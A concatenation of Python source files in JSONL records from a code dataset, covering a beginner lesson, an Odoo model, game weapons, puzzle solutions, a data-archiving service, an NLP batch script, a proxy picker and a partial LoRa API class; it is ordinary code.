1)\nmy_gear1.change_length(2)\n\n\n","sub_path":"Plugins/Scripts/Modeling/Gear.py","file_name":"Gear.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"574300925","text":"'''\nLesson 4\nUse it all\n'''\n\n#Here we set the variable name equal to the user's input after the prompt.\n#\\n gets a new line.\nname = input(\"Hello. What's your name?\\n\")\n\nprint(f\"Hello {name}, nice to meet you!\") # f stands for formatting and interprets anything inside {} as code.\n\n#Ask for only an integer age.\n#While statement\nwhile True:\n try:\n #Tries to convert age to an int\n age = int(input(\"How old are you?\\n\"))\n break\n #If it can't convert it loops.\n except ValueError:\n print(\"That isn't a valid age.\")\n\n#Checks if users is old enough to use discord.\n#elif is Python's else if.\nif age < 13:\n while True:\n print(\"Llama\")\nelif age >= 13:\n print(f\"Congrats {name}! You can use Discord!\")\n #Same as\n #for x in range(0,6)\n for x in [0,1,2,3,4,5]:\n print(\"Woop!\")\nelse:\n print(\"How the fuck did this happen?\")\n","sub_path":"Lesson 4/Lesson 4.py","file_name":"Lesson 4.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"77056591","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom random import randint\r\nfrom odoo import api, fields, models, _\r\n\r\n\r\nclass DepartmentCategory(models.Model):\r\n _name = \"hr.department.category\"\r\n _description = \"Department Category\"\r\n\r\n def _get_default_color(self):\r\n return randint(1, 11)\r\n\r\n name = fields.Char(string=\"Tag Name\", required=True)\r\n color = fields.Integer(string=\"Color Index\", default=_get_default_color)\r\n company_id = fields.Many2one(\r\n \"res.company\",\r\n string=\"Company\",\r\n index=True,\r\n default=lambda self: self.env.company,\r\n )\r\n department_ids = fields.Many2many(\r\n \"hr.department\",\r\n \"department_category_rel\",\r\n \"category_id\",\r\n \"dmp_id\",\r\n string=\"Departments\",\r\n )\r\n tagid = fields.Integer(\r\n string=\"WeCom Tag ID\",\r\n readonly=True,\r\n default=0,\r\n help=\"Tag ID, non negative integer. When this parameter is specified, the new tag will generate the corresponding tag ID. if it is not specified, it will be automatically increased by the current maximum ID.\",\r\n )\r\n is_wecom_category = fields.Boolean(\r\n string=\"WeCom Tag\",\r\n default=False,\r\n )\r\n\r\n _sql_constraints = [\r\n (\"name_uniq\", \"unique (name)\", \"Tag name already exists !\"),\r\n ]\r\n","sub_path":"wecom_hrm/models/hr_department_category.py","file_name":"hr_department_category.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"123697554","text":"\"\"\"-----------------------------------------------------------------------------\n Cannon Weapon\n\n Fires a huge shell that bounces. Shoots out shrapnel on expiry.\n-----------------------------------------------------------------------------\"\"\"\n\nfrom ..base_weapon import Base_Weapon\nfrom ..base_projectile import Base_Projectile\nfrom modules.shockwave import play_sound\n\nclass Weapon(Base_Weapon):\n def __init__(self):\n Base_Weapon.__init__(\n self,\n mechanism_type=\"semiautomatic\",\n name=\"cannon\",\n display_name=\"Cannon\",\n projectile=Projectile,\n ammo_count=2,\n heat=80,)\n\n\nclass Projectile(Base_Projectile):\n def __init__(self, robot):\n Base_Projectile.__init__(\n self,\n robot,\n name=\"shell\",\n damage=20,\n hit_radius=20,\n velocity=20,\n life=1,)\n self.shrapnel_count = 40\n\n def on_expiry(self):\n play_sound(\"explosionbig1\")\n for i in range(self.shrapnel_count):\n projectile = Shrapnel(self.robot)\n projectile.location = self.location\n projectile.overburn = self.overburn\n self.robot.match.projectiles.append(projectile)\n\n\nclass Shrapnel(Base_Projectile):\n def __init__(self, robot):\n Base_Projectile.__init__(\n self,\n robot,\n name=\"pellet\",\n damage=4,\n hit_radius=14,\n velocity=8,\n velocity_scatter=5,\n angle_scatter=360,\n life=-1,)\n\n def move(self):\n Base_Projectile.move(self)\n self.velocity *= 0.95\n if self.velocity < 0.05:\n self.expire()\n\n\n\n\n\n","sub_path":"modules/equipment_modules/weapon_equipment/Cannon.py","file_name":"Cannon.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"51394082","text":"# https://codingcompetitions.withgoogle.com/codejam/round/0000000000051705/0000000000088231?show=progress\r\n\r\n\r\ndef calculate(n):\r\n x = 0\r\n y = 0\r\n for i in range(0,len(n)):\r\n if int(n[i]) == 4:\r\n x = x*10 + 2\r\n y = y*10 + 2\r\n else:\r\n x = x*10 + int(n[i])\r\n y = y*10\r\n return x, y\r\n \r\n\r\n\r\n# input() reads a string with a line of input, stripping the ' ' (newline) at the end.\r\n# This is all you need for most Code Jam problems.\r\nt = int(input()) # read a line with a single integer\r\n\r\nfor i in range(1, t + 1):\r\n n = input()\r\n x, y = calculate(n)\r\n\r\n print(\"Case #{}: {} {}\".format(i, x, y))\r\n \r\n ","sub_path":"2019/Qualification/ForegoneSolution.py","file_name":"ForegoneSolution.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"596931042","text":"# Made by Neal C (nealpointerexception)\n# I do not claim rights to any of the used libraries \nimport openpyxl\n# import openpyxl lib for parsing xl files\n\n# function to findout premium of values\n# correct name should be findPremium -- will add in V1.1 +GUI\n\n# params are dictionary , index, buy or sell, how many shares\n#V1.1 -- (dict, index, choice, shares)\ndef parseValues(dict, key, do, quantity):\n # take the dictionary and load the key value into a float variable\n value = float(dict[key])\n # if selling multiply by -1\n # formula -- value x shares x (1 or -1)\n if(do =='sell'):\n return (value*(quantity*(-1)))\n else:\n return(value*quantity)\n\n\n\n# load work book and store as .Workbook\nwhile(True):\n try:\n # ask user for the name of the file\n fileName = raw_input(\"Please enter the full path to your file or file name(e.g User/nealc/Desktop/fileName or fileName):\\n\")\n workbook = openpyxl.load_workbook(fileName + '.xlsx')\n break\n except(IOError):\n print(\"Oops! It seem that this file doesn't exist!\")\n\n\n\nmainSheet = workbook.get_sheet_by_name('Sheet1')\n# get required sheet from wkbk using sheetname\n\ndictionary = {}\n# created empty dict to hold row/colomn vals\navailKeys = []\n# this is the main for loop that runs through weach row of the file the dictionary holds the key colum and assign the corresponding value from column 2\nfor x in range(1, mainSheet.max_row + 1):\n # in dict add every value in the first column and convert that into strings. make values equal to the corresponding num in second column\n dictionary[str(mainSheet.cell(row=x, column=1).value)] = str(mainSheet.cell(row=x, column=2).value)\n # make list of keys availible to the user\n availKeys.append(str(mainSheet.cell(row=x, column=1).value))\n\n# make containers for list final values and final string outputs\nparsedListVals = []\nparsedListStrings = []\n\n# ask user for values to parse\nprint(\"Enter values to use. Enter 'done' when complete\")\n# main user input loop starts here\n''' PATCH: automaticly set a 3 index limit (V1.0.1 patch)'''\nfor x in range(0, 3, 1):\n\n # mistype prevention system - while loops\n while(True):\n userKey = raw_input(\"Index:\\n\")\n if (userKey.lower() == 'done'):\n break\n # check if the entered value exist\n elif(userKey in availKeys):\n break\n else:\n print(\"Index does not exist!\")\n\n\n while(True):\n userVerb = raw_input(\"buy or sell: \\n\")\n if(userVerb.lower() == 'buy' or userVerb.lower() == 'sell'):\n break\n else:\n print(\"Invalid Input!\")\n\n\n userQuantity = input(\"Enter quantity amount: \\n\")\n\n\n print(\"\\n\")\n\n # string formatting for output - make string append to parsedListStrings\n string = ('If you ' + userVerb+ ' '+ str(userQuantity)+ ' shares of index value: ' + userKey + ' the premium will be: ')\n # append the final net value to parsed list vals\n parsedListVals.append(parseValues(dictionary,userKey,userVerb,userQuantity))\n\n parsedListStrings.append(string + str(parseValues(dictionary,userKey,userVerb,userQuantity)))\n\nprint('\\n\\n')\n# print out all values in StringList\nfor x in parsedListStrings:\n print(x)\n\n# print all list values by adding up all the values in the final list thing lol\nprint(\"The net amount will be: \"+ str(sum(parsedListVals)))\n\n'''PATCH: bugfix V1.0.1'''\nraw_input(\"\\nPress Enter to exit\")\n","sub_path":"NetPredict-V1.0/NetPredict-V1_0.py","file_name":"NetPredict-V1_0.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"497269321","text":"'''\nCreated on 2016. 10. 1.\n\n@author: Administrator\n'''\n\ndef fileWrite():\n print('file write...')\n fp = open('test.txt', 'w')\n fp.write('kor\\nea')\n fp.close()\n \ndef fileRead():\n print('file read...')\n fp = open('test.txt','r')\n rd = fp.read()\n fp.close()\n print(rd)\n \nif __name__ == '__main__':\n fileWrite()\n fileRead()","sub_path":"fileTest1.py","file_name":"fileTest1.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"313761945","text":"import logging\r\nimport os\r\nimport datetime\r\nimport cStringIO\r\n\r\n\r\ntry:\r\n from scheduledfeeds.messaging import dispatch_archive_event\r\n from scheduledfeeds.utils import get_unique_filename\r\n from scheduledfeeds.utils import get_archive_filename \r\nexcept:\r\n pass\r\n\r\nfrom kew.pe.utils.emailutil import send_email\r\nfrom kew.pe.utils.ioservice import IOService\r\n\r\nclass DailyArchive(IOService):\r\n \"\"\" Class representing the daily archive ioservice.\"\"\"\r\n \r\n #NB all defaults are handled in DailyArchiveFeed\r\n def __init__(self, props, working_path, asofdate, lib_path, java_path):\r\n \r\n datetoday = datetime.date.today()\r\n self.asofdate = asofdate\r\n \r\n working_path = os.path.join(working_path, datetoday.strftime(\"%Y%m%d\"), \"dailyarchive\")\r\n try:\r\n os.makedirs(working_path)\r\n except:\r\n pass\r\n \r\n self.log_file = os.path.join(working_path, \"%s_daily_archive.log\" % self.asofdate)\r\n self.input_file = os.path.join(working_path, \"%s_daily_archive_input.txt\" % self.asofdate)\r\n self.output_file = os.path.join(working_path, \"%s_daily_archive_output.csv\" % self.asofdate)\r\n \r\n IOService.__init__(self,\r\n service=\"runBatchCmd\",\r\n props=props,\r\n input_file=self.input_file,\r\n output_file=self.output_file,\r\n log_file=self.log_file,\r\n outDelim=\"|\",\r\n columms=None,\r\n lib_path=lib_path,\r\n java_path=java_path,\r\n trans=None,\r\n aggreg=False)\r\n \r\n def _buildInputfile(self):\r\n \r\n logging.info(\"Building input file %s\" % self.input_file)\r\n \r\n outstring = cStringIO.StringIO()\r\n # Replace the date keys in the input file, with the correct date range\r\n lines = ['batchCommand,args',\r\n 'archiveCurrency,',\r\n 'archiveMarks,-portfolios archive_all -overrideMarks ALL -markConstituents Y -priceSource LIVE -markUnderlyings Y',\r\n 'archiveYieldCurveScenario, -scenarioName DEFAULT -extension KEW -save',\r\n 'archiveMarks,-portfolios archive_currency -overrideMarks ALL -markConstituents Y -priceSource ASOF -markUnderlyings Y -asof {}'.format(self.asofdate.strftime(\"%Y%m%d\")),\r\n '']\r\n outstring.write(\"\\n\".join(lines))\r\n outfile = file(self.input_file, \"wb\")\r\n outfile.write(outstring.getvalue())\r\n outfile.close()\r\n \r\n def run(self, retry, smtpServer, emailFrom, emailTo, archive_file):\r\n \r\n self._buildInputfile()\r\n IOService.run(self, retry)\r\n \r\n if not os.path.exists(self.output_file):\r\n logging.warning(\"The Daily Archiving failed, missing output file\")\r\n subject = 'Daily Archiving Failed'\r\n body = 'The Daily Archiving failed with error: missing output file. Imagine logfile attached if it exists.'\r\n send_email(smtpServer, emailFrom, emailTo, subject, body, {os.path.dirname(self.log_file):os.path.basename(self.log_file)})\r\n return\r\n \r\n paths = os.path.split(archive_file)\r\n archive_file = os.path.join(paths[0], \"%s_%s\" % (self.asofdate, paths[1]))\r\n \r\n outputFile= file(archive_file, 'wb')\r\n for tempFile in [self.output_file]:\r\n logging.info('Reading part file %s' % tempFile)\r\n tfile = file(tempFile, 'rb')\r\n line = tfile.readline() \r\n while line:\r\n outputFile.write(line)\r\n line = tfile.readline()\r\n outputFile.close()\r\n \r\n logging.info(\"Done\") \r\n return archive_file\r\n \r\nclass DailyArchiveFeed(object):\r\n \"\"\" Feed to call the daily archiving. \r\n \r\n asofdate format: YYYYMMDD\r\n \"\"\"\r\n \r\n def __init__(self, path, filename, props, working_path, asofdate=None, retry=1, java_path=\"C:\\Program Files\\Imagine Software\\its\\jre\\bin\",\r\n lib_path=\"C:\\Program Files\\Imagine Software\\its\\Lib\", email_to=\"monitors@kewcapital.com\", smtp_server=\"KC-LN-VS35-PROD1:1025\"):\r\n \r\n self.path = os.path.abspath(path)\r\n \r\n datetoday = datetime.date.today()\r\n if asofdate and isinstance(asofdate, basestring):\r\n asofdate = datetime.datetime.strptime(asofdate, '%Y%m%d').date()\r\n else:\r\n asofdate = datetoday\r\n \r\n self.filename = os.path.abspath(get_archive_filename(self.path, filename, datetoday, 'imagine_maintenance'))\r\n \r\n self.ios = DailyArchive(props = props,\r\n working_path=working_path,\r\n asofdate=asofdate,\r\n java_path=java_path,\r\n lib_path=lib_path)\r\n \r\n try:\r\n self.retry = int(retry)\r\n except:\r\n self.retry = 0\r\n self.smtp_server = smtp_server\r\n self.email_from = 'reportingdb@kewcapital.com'\r\n self.email_to = email_to.split(',')\r\n \r\n def run(self):\r\n self.filename = self.ios.run(self.retry, self.smtp_server, self.email_from, self.email_to, self.filename)\r\n \r\n message = 'created %s' % self.filename\r\n dispatch_archive_event(sender = self,\r\n path = self.filename,\r\n rpath = None,\r\n source = 'imagine_maintenance',\r\n message = message)\r\n return self.filename\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"src/kew/pe/plugins/feeds/dailyArchive.py","file_name":"dailyArchive.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"251434345","text":"\"\"\" split data for training \"\"\"\nimport tensorflow as tf\n\ntf.app.flags.DEFINE_string(\"infile\", \"\", \"Raw data path\")\nFLAGS = tf.app.flags.FLAGS\n\n\ndef addsuffix(str,suffix):\n pieces = str.split('.')\n pieces[-2] += suffix\n return '.'.join(pieces)\n\n\ndef main(_):\n with open(FLAGS.infile, \"r\", encoding='utf-8', errors='ignore') as infile:\n lines = list(infile)\n count = len(lines)\n train = []\n val = []\n test = []\n valmark = int(.8*count)\n testmark = int(.9*count)\n for i, line in enumerate(lines):\n line = line.rstrip().lstrip()\n if i < valmark:\n train.append(line)\n elif i < testmark:\n val.append(line)\n else:\n test.append(line)\n with open(addsuffix(FLAGS.infile,'_train'), 'w') as f:\n for line in train:\n f.write('%s\\n' % line)\n with open(addsuffix(FLAGS.infile,'_val'), 'w') as f:\n for line in val:\n f.write('%s\\n' % line)\n with open(addsuffix(FLAGS.infile,'_test'), 'w') as f:\n for line in test:\n f.write('%s\\n' % line)\n\nif __name__ == \"__main__\":\n tf.app.run()\n\n\n\n\n\n\n\n\n\n","sub_path":"splitfile.py","file_name":"splitfile.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"131697695","text":"from mongoengine import Document\nfrom mongoengine.fields import (\n DateTimeField, ReferenceField, StringField,\n)\nclass StudentName(Document):\n meta = {'collection': 'student_name'}\n name = StringField()\n\nclass Courses(Document):\n \"\"\"list of courses taken\"\"\"\n meta = {'collection': 'courses'}\n name = StringField()\n\nclass Student(Document):\n \"\"\"docstring fos Student\"\"\"\n meta= {'collection':'student'}\n student_name = ReferenceField(StudentName)\n courses = ReferenceField(Courses)\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"430599003","text":"\"\"\"\n5475. 统计好三元组\n\"\"\"\n\n\nclass Solution:\n def countGoodTriplets(self, arr, a: int, b: int, c: int) -> int:\n cnt = 0\n for i in range(len(arr) - 2):\n for j in range(i + 1, len(arr) - 1):\n if abs(arr[i] - arr[j]) <= a:\n for k in range(j + 1, len(arr)):\n if abs(arr[j] - arr[k]) <= b and abs(arr[i] - arr[k]) <= c:\n cnt += 1\n\n return cnt\n\n\nif __name__ == '__main__':\n s = Solution()\n assert (s.countGoodTriplets([3, 0, 1, 1, 9, 7], 7, 2, 3) == 4)\n assert (s.countGoodTriplets([1, 1, 2, 2, 3], 0, 0, 1) == 0)\n","sub_path":"array/5475.py","file_name":"5475.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"130076535","text":"import argparse\nimport json\nimport sys\nimport glob\nimport googleapiclient.discovery\nimport os\nimport concurrent.futures\n\n\ndef get_native_encoding_type():\n \"\"\"Returns the encoding type that matches Python's native strings.\"\"\"\n if sys.maxunicode == 65535:\n return 'UTF16'\n else:\n return 'UTF32'\n\n\ndef analyze_entities(text, encoding='UTF32'):\n body = {\n 'document': {\n 'type': 'PLAIN_TEXT',\n 'content': text,\n 'language': 'EN'\n },\n 'encoding_type': encoding,\n }\n service = googleapiclient.discovery.build('language', 'v1')\n request = service.documents().analyzeEntitySentiment(body=body)\n try:\n response = request.execute()\n except:\n response = {}\n return response\n\ncounter = 0\nresults = {}\nos.chdir(\"texts\")\nall_data = []\nfiles = glob.glob(\"*.txt\")\nfor file in files:\n\twith open(file, 'r') as myfile:\n data=myfile.read(999999).replace('\\n', '')\n all_data += [data]\n\ndata = {}\nwith concurrent.futures.ThreadPoolExecutor(max_workers=500) as executor:\n future_to_url = {executor.submit(analyze_entities, url): url for url in all_data}\n for i, future in enumerate(concurrent.futures.as_completed(future_to_url)):\n url = future_to_url[future]\n try:\n data[files[i]] = future.result()\n except Exception as exc:\n print('except')\n else:\n print(counter)\n counter += 1\n\nfrom itertools import islice\n\ndef chunks(data, SIZE=100):\n it = iter(data)\n for i in range(0, len(data), SIZE):\n yield {k:data[k] for k in islice(it, SIZE)}\n\nfor i, chunk in enumerate(chunks(data)):\n name = 'result' + str(i) + '.json'\n with open(name, 'w') as fp:\n json.dump(chunk, fp)\n\n\n\n","sub_path":"language/api/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"140751464","text":"import requests\nimport random\n\n\nclass RandProxy:\n def __init__(self, types=None):\n self.token = ''\n self.url = ''\n self.proxy_list = self._proxy(types)\n\n def _header(self) -> dict:\n \"\"\"\n Requests Header Set\n \"\"\"\n return {\n 'Authorization': 'Token ' + self.token,\n }\n\n def _proxy(self, types) -> dict or None:\n \"\"\"\n API 로 모든 Proxy list 가져오기\n \"\"\"\n if types:\n url = f'{self.url}?type={types}'\n else:\n url = self.url\n\n try:\n res = requests.get(url, headers=self._header(), timeout=5)\n except requests.RequestException:\n res = None\n else:\n res.raise_for_status()\n res = res.json()\n\n return res\n\n def get(self) -> dict:\n \"\"\"\n 전체 Proxy 중 랜덤으로 선택하여 리턴\n \"\"\"\n secure_random = random.SystemRandom()\n proxy = secure_random.choice(self.proxy_list)\n\n return {\n 'http': f'{proxy[\"protocol\"]}://{proxy[\"user\"]}:{proxy[\"password\"]}@{proxy[\"ip\"]}:{proxy[\"port\"]}'\n }\n","sub_path":"utils/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"581422789","text":"import csv\nimport numpy as np\n\n# load data from text file\ninput_file = np.genfromtxt(r'KNMI.csv', delimiter = ',', names = True, dtype = None)\n\n# create output file\noutput_file = open('KNMINEW.csv', 'w')\n\n# call up writer\nwriter = csv.writer(output_file)\n\ni = 0\n\n# iterate over each row\nfor rows in b:\n # get year and split and concatenate into correct format\n date = b['YYYYMMDD'][i]\n date = str(date)\n year = date[:4]\n month = date[4:6]\n day = date[6:8]\n realdate = year+'/'+month+'/'+day\n\n # get temperature\n temperature = b['TX'][i]\n\n # write into a new file\n writer.writerow([realdate, temperature])\n i += 1\n","sub_path":"Homework/Week 3/csvscraper.py","file_name":"csvscraper.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"159473672","text":"__author__ = 'Prashanth Ayyavu'\n\nfrom pyspark import SparkContext\n\nlogFile = \"/Users/prashanthayyavu/projects/software/spark-1.5.2-bin-hadoop2.6/README.md\"\n\nsc = SparkContext(\"local\", \"Simple App\")\nlogData = sc.textFile(logFile).cache()\n\n# Transformation\n# An operation performed on a RDD\n# Takes an user-defined function and applies it to all elements of the RDD\n# And produces a new RDD\n\npairs = logData.map(lambda s: (s, 1))\ncounts = pairs.reduceByKey(lambda a, b: a + b)\n\n'''\nWhile most Spark operations work on RDDs containing any type of objects, a few special operations are only available on RDDs of key-value pairs.\nThe most common ones are distributed “shuffle” operations, such as grouping or aggregating the elements by a key.\n\nKeyValue RDDs are called as pair RDDs\n\nexpose operations that allow you to act on each key in parallel or regroup data across the network\npair RDDs have a reduceByKey() method that can aggregate data separately for each key, and\na join() method that can merge two RDDs together by grouping elements with the same key\n\nConstructing a KeyValue or pairRDD from a normal RDD\nIt is common to extract fields from an RDD (representing, for instance, an event time, customer ID, or other identifier) and use those fields as keys in pair RDD operations.\n\nTuples:\nspark has functions... that can work on KeyValuePair RDD\nIn Python and Scala, for these functions on keyed data to work -- we need to return an RDD composed of tuples\nIn Java we dont have a built-in type tuple\n\nscala.Tuple2\nIn Java, key-value pairs are represented using the scala.Tuple2 class from the Scala standard library.\nYou can simply call new Tuple2(a, b) to create a tuple, and access its fields later with tuple._1() and tuple._2().\n\nRDDs of key-value pairs are represented by the JavaPairRDD class.\n\nJava : mapToPair() or flatMapToPair()\nYou can construct JavaPairRDDs from JavaRDDs using special versions of the map operations, like mapToPair and flatMapToPair.\nThe JavaPairRDD will have both standard RDD functions and special key-value ones.\n\nPython, Scala : map()\n\nCollections to pairRDDs\nPythonPairCollection -> parallelize() -> pairRDD\nScalaPairCollection -> parallelize() -> pairRDD\nJavaPairCollection -> parallelizePairs() -> pairRDD\n\nTransformation\nPairRDDs are allowed to use all the transformations available to standard RDDs.\n+ some unique transformations for pairRDDs.\nSince pair RDDs contain tuples, we need to pass functions that operate on tuples rather than on individual elements.\n\n'''\n","sub_path":"spark.python/src/KeyValuePairRDD.py","file_name":"KeyValuePairRDD.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"369889610","text":"#coding=utf-8\n#/usr/bin/env python3\n\n\nclass Person(object):\n __slots__=(\"name\",\"age\",\"addr\")\n\n\n\nP=Person()\n\nP.name=\"laowang\"\nP.age=33\nP.addr=\"Nanjing\"\n\n\nprint(P.name+\" \"+str(P.age)+\" \"+P.addr)\n\nP.tel=\"123456\"\nprint(P.tel)\n","sub_path":"section-2-python-advanced/04-namespace/slots.py","file_name":"slots.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"161035806","text":"'''\r\n # https://accounts.google.com/SignUpWithoutGmail?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dwm<mpl=default\r\n # This modules task is to decode the example above to example below\r\n # https://accounts.google.com/SignUpWithoutGmail?\r\n # https://mail.google.com/mail/?tab=wm<mpl=default\r\n # Version 2.0.\r\n # A new version is released the first of every two weeks.\r\n # This project is maintained by Optical Quantum Virus.\r\n # this project cannot and will not be used in a commercial use only for personal or private use.\r\n'''\r\n\r\n# noinspection PyMethodMayBeStatic\r\nfrom queue import Queue\r\nfrom urllib import parse\r\n\r\n\r\n# noinspection PyMethodMayBeStatic\r\nclass URLDecoder:\r\n # Constructor for URLDecoder\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # This will decode the url\r\n def Decode(self, url, queue: Queue()):\r\n\r\n # we are decoding the url\r\n decoded = parse.unquote(url)\r\n\r\n # this is the url we are going to listen for\r\n symbols = [\"?\", \"&\", \"=\"]\r\n\r\n # this will keep track of the link\r\n link = \"\"\r\n\r\n # we are looping through the decoded link\r\n for i in decoded:\r\n\r\n # checking if the char is in symbols list\r\n if str(i) not in symbols:\r\n\r\n # appending the char to the string\r\n link += i\r\n else:\r\n\r\n # we are checking if the link starts with http or https\r\n if not str(link).startswith(\"http\") or not str(link).strip(\"https\"):\r\n\r\n # setting the string link to empty\r\n link = \"\"\r\n else:\r\n print(\"\\033[1;45;10m\" + str(link).strip())\r\n\r\n # we are adding the link to the queue\r\n queue.add(str(link).strip())\r\n\r\n # setting the string link to empty\r\n link = \"\"\r\n","sub_path":"Spider/Decoders/URLDecoder.py","file_name":"URLDecoder.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"137023938","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# https://www.hackerrank.com/challenges/sherlock-and-anagrams/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=dictionaries-hashmaps\n# Complete the sherlockAndAnagrams function below.\ndef sherlockAndAnagrams(substr):\n # get all sub strings\n # dict of substrings -> (instanceCount:number, letters:dict{letter -> count})\n # instanceCount - for anagrams that are identical (pairs would be count - 1)\n # letters - must have same letter/count pairs as other substrings of same length\n\n # substrings\n substrings = [\n substr[i: j]\n for i in range(len(substr))\n for j in range(i + 1, len(substr) + 1)\n ]\n\n # note, I made my own substring combination before in 02_two_strings.py:\n # foo\n # f, o, o, fo, oo, foo\n # 0:1, 1:2, 2:3, 0:2, 1:3, 0:3\n # 0:1, 0:2, 0:3, 1:2, 1:3, 2:3\n\n # def get_substrings(s):\n # substrings = set()\n # for i in range(len(s)):\n # for j in range(i + 1, len(s) + 1):\n # substr = s[i:j]\n # substrings.add(substr)\n #\n # return substrings\n\n # get dict of instance counts and letter counts\n stats = {}\n for substr in substrings:\n if not stats.get(substr):\n letters = {}\n for char in substr:\n if not letters.get(char):\n letters[char] = 1\n else:\n letters[char] = letters[char] + 1\n\n stats[substr] = {\n 'instance_count': 1,\n 'length': len(substr),\n 'letters': letters\n }\n else:\n substr_stats = stats[substr]\n substr_stats['instance_count'] = substr_stats['instance_count'] + 1\n\n # print(stats)\n\n # for each substring (stats key), look for other substrings of same length that have same letter counts\n\n # for substr, substr_stats in stats.items():\n\n ##\n # ugg, nested loop is not elegant, and no way its going to pass perf\n\n ##\n # solution 2: sub strings, with characters sorted\n\n substr_counts = {}\n for substr in substrings:\n substr_sorted = ''.join(sorted(substr))\n if not substr_counts.get(substr_sorted):\n substr_counts[substr_sorted] = 1\n else:\n substr_counts[substr_sorted] = substr_counts[substr_sorted] + 1\n\n # anagrams_count = 0\n # for counts in substr_counts.values():\n # anagrams_count += (counts - 1)\n\n # return anagrams_count\n\n ##\n # oops, they want all combinations, need to factorial?\n # anagrams_count = 0\n # for counts in substr_counts.values():\n # if counts == 1:\n # continue\n #\n # anagrams_count += math.factorial(counts - 1)\n\n ##\n # oops, factorial is not how you calculate combinations\n # n choose r (where r = 2) since we want pairs\n anagrams_count = 0\n for counts in substr_counts.values():\n # math.comb only works in py 3.8?\n # anagrams_count += math.comb(counts, 2)\n\n if counts <= 1:\n continue\n\n # nCr = (n!) / (r!(n - r)!)\n anagrams_count += int(\n math.factorial(counts) /\n (2 * math.factorial(counts - 2)))\n\n # return substr_counts\n return anagrams_count\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n s = input()\n\n result = sherlockAndAnagrams(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","sub_path":"py/hacker-rank/interview_prep/02_hashmaps/03_sherlock_and_anagrams.py","file_name":"03_sherlock_and_anagrams.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"8087214","text":"import time\nimport json\nimport pycom\nimport socket\nimport struct\nfrom network import LoRa\nfrom machine import Timer\n\nclass loraAPI:\n\n # A basic package header,\n # B: 1 byte for the deviceId,\n # B: 1 byte for the package size,\n # %ds: Formated string for string\n _LORA_GATEWAY_PKG_FORMAT = \"!BB%ds\"\n\n # A basic package header,\n # B: 1 byte for the deviceId,\n # B: 1 bytes for the package size\n _LORA_NODE_PKG_FORMAT = \"BB%ds\"\n\n # A basic ack package,\n # B: 1 byte for the deviceId,\n # B: 1 bytes for the package size,\n # B: 1 byte for the Ok (200) or error messages\n _LORA_PKG_ACK_FORMAT = \"BBB\"\n\n # Please pick the region that matches where you are using the device:\n # Asia = LoRa.AS923\n # Australia = LoRa.AU915\n # Europe = LoRa.EU868\n # United States = LoRa.US915\n _LORA_REGION = LoRa.AU915\n\n _LORA_ACKNOWLEDGEMENT_TIMEOUT = 3 # seconds\n\n def __init__(self, device_id=0, device_name='No-name', device_colour='white', device_colour_code=0xFFFFFF, is_gateway=False):\n # Each newly created object holds onto these parameters (device_id, etc.)\n # because it will need to use them later.\n self.device_id = device_id\n self.device_name = device_name\n self.device_colour = device_colour\n self.device_colour_code = device_colour_code\n self.is_gateway = is_gateway\n\n # RGBLED\n # Disable the on-board heartbeat (blue flash every 4 seconds)\n # We'll use the LED to identify each unit with different colours\n pycom.heartbeat(False)\n time.sleep(0.1) # Workaround for a bug.\n # Above line is not actioned if another\n # process occurs immediately afterwards\n pycom.rgbled(self.device_colour_code)\n print(\"{} is {}\".format(self.device_name, self.device_colour))\n\n # I don't 